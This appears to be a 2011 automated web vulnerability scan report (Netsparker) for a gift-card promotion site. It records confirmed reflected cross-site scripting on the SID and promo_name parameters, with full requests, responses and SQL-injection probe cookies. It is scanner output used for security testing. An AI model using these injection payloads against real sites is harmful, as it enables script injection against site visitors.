You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET '"--></style></script><script>alert(0x0001D3)</script>

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D3)%3C/script%3E HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:32 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830f84cf6c41e;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID='"--></style></script><script>netsparker(0x0001D3)</script>','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001D3%29%3C%2Fscript%3E" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001D3%29%3C%2Fscript%3E" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001D3%29%3C%2Fscript%3E#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001D3%29%3C%2Fscript%3E#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001D3%29%3C%2Fscript%3E" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001D3%29%3C%2Fscript%3E" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001D3%29%3C%2Fscript%3E" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001D3%29%3C%2Fscript%3E" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001D3%29%3C%2Fscript%3E" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001D3%29%3C%2Fscript%3E" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



<!-- The Useful event tag. Do not remove --><script type="text/javaScript">na_fn='';na_ln='';na_zc='_skip819afcebd113f7bb302c571b';na_cy='_skip819afcebbf318b717b643f81';na_st='xx';na_a1='_skip819afcebe33d64b4efa5b47c';na_a2='';na_em='dork@webprizeland.com';</script><script type="text/javascript">if ('**' == 'us'){// commented out to disable nextAction. system down 4/28/09 mpt - if ("http:" == document.location.protocol) { document.write(unescape("%3Cscript src='http://e.nexac.com/e/a-1077/s-1949.js' type='text/javascript'%3E%3C/script%3E")); }}</script><!-- QI third party pixel --><script type="text/javaScript">if ('' != '59'){ if ("http:" == document.location.protocol){ document.write(unescape("%3Ciframe src='http://i.pcp001.com/media/qi.html?gender=&age=0&firstname=&lastname=&gender=&street=_skip819afcebe33d64b4efa5b47c&city=_skip819afcebbf318b717b643f81&state=xx&zip=_skip819afcebd113f7bb302c571b&email=dork@webprizeland.com' scrolling='no' frameborder='0' width='1' height='1'%3E%3C/iframe%3E")); }}</script><!-- Rapleaf Pixel --><script type="text/javaScript">if ('' != '59' && '' != ''){ if ("http:" == document.location.protocol) { document.write(unescape("%3Ciframe src='http://i.pcp001.com/media/rapleaf.html?s=' scrolling='no' frameborder='0' width='1' height='1'%3E%3C/iframe%3E")); }}var pixel_domains = ['netradiance.com','my-rewardsvault.com','consumerincentiverewards.com','superbrewards.com','your-gift-zone.com','consumerincentivepromotions.com','nationalsurveypanel.com','mypremiumrewards.com','holiday-reward-vault.com','onlinerewardcenter.com','exclusivegiftcards.com','go-free-gifts.com','cellphoneincentives.com','brand-reward-central.com','brandsurveypanel.com','video-game-rewards-central.com','premiumproductsonline.com','my-reward-channel.com','premium-reward-club.com','cool-premiums.com','exclusivesamples.com','gameconsolerewards.com'];var show_pixel = false;for ( var i =0 ; i < pixel_domains.length; ++i ) {if ( pixel_domains[i] == "your-gift-zone.com") {show_pixel = true;break;}}show_pixel = false;if ( show_pixel == true ) {document.write(unescape("%3Ciframe frameborder='0' style='height:0;width:0;' src='http://www.freebieclubs.com/member/index.jsp?6gZYlfy7Y7Q=&userEmail=dork@webprizeland.com&userName=&status='%3E%3C/iframe%3E"));}</script><form name="flgxfrm" id="frm_flgxfrm"><input type="hidden" name="SID" value="%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001D3%29%3C%2Fscript%3E" /><input type="hidden" name="uniqueID" value="200492244"><input type="hidden" name="id" value=""><input type="hidden" name="offerID" value=""><input type="hidden" name="fullname" value=""><input type="hidden" name="fname" value=""><input type="hidden" name="lname" value=""><input type="hidden" name="address1" value=""><input type="hidden" name="address2" value=""><input type="hidden" name="city" value=""><input type="hidden" name="state" value="xx"><input type="hidden" name="postalcode" value="_skip819afcebd113f7bb302c571b"><input type="hidden" name="country" value="**"><input type="hidden" name="email" value="dork@webprizeland.com"><input type="hidden" name="phone" value=""><input type="hidden" name="other1" value="90563525"><input type="hidden" name="other2" value=""></form><div id="flpx_52_118" style="height:1px; width:1px;"></div><script type="text/javascript" language="javascript">var _flbtn="";if(document.getElementById('frm_flgxfrm').SID) { document.getElementById('frm_flgxfrm').SID.value = ''; document.getElementById('frm_flgxfrm').SID.name = 'sid'; }if( == 599) {if('your-gift-zone.com' == 'your-gift-zone.com' || 'your-gift-zone.com' == 'my-rewardsvault.com' || 'your-gift-zone.com' == 'consumerincentiverewards.com' || 'your-gift-zone.com' == 'nationalsurveypanel.com' || 'your-gift-zone.com' == 'consumerincentivepromotions.com' || 'your-gift-zone.com' == 'go-free-gifts.com' || 'your-gift-zone.com' == 'premiumproductsonline.com' || 'your-gift-zone.com' == 'exclusivegiftcards.com' || 'your-gift-zone.com' == 'video-game-rewards-central.com' || 'your-gift-zone.com' == 'holiday-reward-vault.com' || 'your-gift-zone.com' == 'onlinerewardcenter.com' || 'your-gift-zone.com' == 'mypremiumrewards.com' || 'your-gift-zone.com' == 'topchoiceincentives.com' || 'your-gift-zone.com' == 'brand-reward-central.com' || 'your-gift-zone.com' == 'superbrewards.com' || 'your-gift-zone.com' == 'premium-reward-clu..
- /info.htm

/info.htm CONFIRMED

http://your-gift-zone.com/info.htm?tp=tos&promo_name='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..

Parameters

Parameter Type Value
tp GET tos
promo_name GET '"--></style></script><script>alert(0x0001F5)</script>
catalog_id GET 13200
gift GET 29617
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /info.htm?tp=tos&promo_name='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F5)%3C/script%3E&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==; 0)>0)=; 0)<255)=; 0)>25)=; 2))=; 1))>0=; 1))<255=; 1))>255=; 1))>25=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:14:38 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db832df0ad725kq;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie='"--></style></script><script>netsparker(0x0001F5)</script>;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,gift_cookie=29617;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html










<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Your-gift-zone</title>
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/global-cust-service.css" />
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/giftstatus-content.css" />
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/IE6fix.css"><![endif]-->




<style type="text/css">
#emailaddr {
margin-top:30px;
float:left;
width:355px;
padding-bottom:70px;
}
#offer {
float:left;
width:228px;
height:209px;
margin-left:0px;
}
</style>


</head>
<body>

<div id="frame">
<div id="header">
<div id="navbar">
<div class="hovermenu">
<ul>
<li><a href="http://your-gift-zone.com/info.htm?tp=faq&user_gift_id=&promo_name='"--></style></script><script>netsparker(0x0001F5)</script>&gift=29617&catalog_id=13200" target="_self">HELP</a></li>
<li><a href="http://your-gift-zone.com/redeem.htm?user_gift_id=&promo_name='"--></style></script><script>netsparker(0x0001F5)</script>&gift=29617&catalog_id=13200" target="_self">GIFT STATUS</a></li>
<li><a href="http://your-gift-zone.com/testimonials.htm?user_gift_id=&promo_name='"--></style></script><script>netsparker(0x0001F5)</script>&gift=29617&catalog_id=13200&wrap=0" target="_self">TESTIMONIALS</a></li>
<li><a href="http://your-gift-zone.com/info.htm?tp=con&user_gift_id=&promo_name='"--></style></script><script>netsparker(0x0001F5)</script>&gift=29617&catalog_id=13200" target="_self">&nbsp;&nbsp;CONTACT US&nbsp;&nbsp;&nbsp;</a></li>
</ul>
</div>
</div>
<div id="mainhdr">Your-gift-zone</div>
<div id="pagehdr">Terms &amp; Conditions</div>
</div>

<div id="content" class="clearfix">
<div id="girlbody"><img src="http://i.pcp001.com/media/cs/girlbody.jpg" width="158" height="299"></div>
<div id="girlfingers"><img src="http://i.pcp001.com/media/cs/girl-fingers.jpg" width="343" height="54"></div>
<div id="mainarea">
<!--header:start-->
<p class="headline_txt"><b><font size="+1">Effective Date: July 29, 2010.</font></b></p>
<!--header:end-->

<p>Welcome to the Your-gift-zone Web site (hereinafter the &ldquo;<strong>Site</strong>&rdquo;), operated by Reliant (&ldquo;<strong>Company</strong>&rdquo;). The following terms and conditions, the Privacy Policy and any other policies, notices, rules or guidelines posted on the Site shall govern your use of the Site and your participation in the Program. Because this terms and conditions document (the &ldquo;<strong>Terms and Conditions</strong>&rdquo;) constitutes a legal agreement between you and the Company, please read them carefully. Capitalized terms not defined in the text are defined in the section entitled &ldquo;Definitions&rdquo; at the end of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">1. YOUR AGREEMENT</font></b></p>
<!--header:end-->

<p>By using this Site, you agree to be bound by, and to comply with, these Terms and Conditions. You also agree to comply with any guidelines or rules posted on the Site, and all such guidelines and rules are hereby incorporated by reference into these Terms and Conditions. If you are dissatisfied with this Site, its content or the Terms and Conditions, you agree that your sole and exclusive remedy is to discontinue using this Site and to cancel your participation in the Program.</p>

<p><strong><em>PLEASE NOTE:</em></strong> We reserve the right, in our sole discretion, to change, modify or otherwise alter these Terms and Conditions at any time. Unless otherwise indicated, amendments will become effective on the earlier of (i) the date such amendment was posted to the Site, or (ii) at the earliest date permitted under applicable law (the &ldquo;<strong>Effective Date</strong>&rdquo;). Please review these Terms and Conditions regularly. Your continued use of the Site or the Program following the Effective Date of any amendment will constitute your acceptance of the amended Terms and Conditions. For your information, this page was last updated as of the date set forth at the top of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">2. PRIVACY</font></b></p>
<!--header:end-->

<p>
Please review our <a href="/info.htm?tp=privacy&user_gift_id=&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001F5)</script>&gift=29617&catalog_id=13200" target="_self">Privacy Policy</a>, which also governs your visit to this Site, to understand our practices relating to the collection and use of personal information.
</p>

<p><strong><em>Express Consent:</em></strong> By accepting the terms and conditions of this Site and providing your telephone number, you are subscribing to a service that transmits special offers to subscribers via pre-recorded voice messages.
</p><p>
By subscribing, you are expressly consenting to receive pre-recorded telephone messages from The Firebrand Group, LLC, a Nevada company doing business as Worldwide Commerce Associates (�WCA�) that include special or discounted sales offers. You are subscribing to receive offers only from WCA, and only at the specific numbers(s) you have provided to us. Your consent will be effective regardless of whether the number you have provided: (a) is a home, business, or cell phone line; and/or (b) is or will be registered on any state or federal Do-Not-Call (DNC) list, and shall remain in effect until you revoke your consent and cancel your subscription.
</p><p>
To unsubscribe: You may cancel your subscription and revoke your consent to receive pre-recorded telephone calls at any time by either (a) utilizing the opt-out procedure included in any message you receive; or (b) by calling 800-269-0281
</p><p>
NOTE: WCA does not send offers via email, and is unable to honor any unsubscribe requests sent by other companies. If you are receiving offers via email please follow the unsubscribe instructions included therein.
</p>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">3. ELIGIBILITY FOR PARTICIPATION</font></b></p>
<!--header:end-->

To be eligible to participate in the Program, you must be at least 18 years of age at the time of registration and reside in the United States. Employees of the Company and persons related to or residing in the same household of such employees are not eligible to become Members. Corporations or other business entities are not eligible to participate. <u>Only one gift is permitted from Reliant per person and/or household for one year after your registration date. </u>


